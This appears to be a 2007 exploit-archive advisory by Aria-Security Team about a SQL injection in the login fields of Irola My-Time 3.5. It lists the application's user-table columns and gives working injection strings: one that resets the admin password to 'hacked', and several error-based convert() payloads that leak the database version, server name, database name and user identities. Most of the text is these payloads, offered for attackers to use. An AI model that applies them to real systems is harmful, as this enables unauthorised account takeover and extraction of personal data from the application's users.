[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Irola My-Time 3.5 Remote SQL Injection Vulnerability
# Published : 2007-11-23
# Author : Aria-Security Team
# Previous Title : RunCMS <= 1.6 Local File Inclusion Vulnerability
# Next Title : Mp3 ToolBox 1.0 beta 5 (skin_file) Remote File Inclusion Vulnerability
Aria-Security Team
http://Aria-Security.Net
-----------------------------
Original Advisory @ http://aria-security.net/forum/showthread.php?p=1106
Vendor: http://www.irola.com
Username/Password Fields can run SQL Queries. Therefore:
We get the Tables:
UserInfo.UserID
UserInfo.Login
UserInfo.Password
UserInfo.UserNumber
UserInfo.FirstName
UserInfo.LastName
UserInfo.TeamID
UserInfo.Address
UserInfo.City
UserInfo.ZipCode
UserInfo.CountryID
UserInfo.Phone
Useful Injection: (changes admin's passwsord to hacked)
-1' UPDATE UserInfo set Password= 'hacked' Where(UserID= '1');--
these may help the attacker to get more info:
1' or 1=convert(int,@@version)--
1' or 1=convert(int,@@servername)--
1' or 1=convert(int,db_name())--
1' or 1=convert(int,user_name())--
1' or 1=convert(int,system_user)--
Greetz: AurA
Credits goes to Aria-Security Team
Regards,
The-0utl4w
# www.Syue.com [2007-11-23]